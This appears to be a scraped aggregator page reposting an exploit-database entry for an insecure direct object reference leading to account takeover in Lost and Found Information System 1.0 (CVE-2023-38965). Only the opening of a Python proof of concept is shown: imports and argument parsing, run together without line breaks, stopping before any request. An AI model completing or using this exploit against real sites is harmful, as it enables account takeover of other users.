Lost And Found Information System 1.0 Insecure Direct Object

Lost And Found Information System 1.0 Insecure Direct Object Reference

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03# Exploit Author: OR4NG.M4N# Category : webapps# CVE : CVE-2023-38965Python p0c :import argparseimport requestsimport timeparser = argparse.ArgumentParser(description='Send a POST request to the target server')parser.add_argument('-url', help='URL of the target', required=True)parser.add_argument('-user', help='Username', required=True)parser.add_argument('-password', help='Password', required=True)args = parser.parse_args()url = args.url

Related Keywords

, Exploit Title , Found Information System , Account Take , Exploit Author ,

© 2025 Vimarsana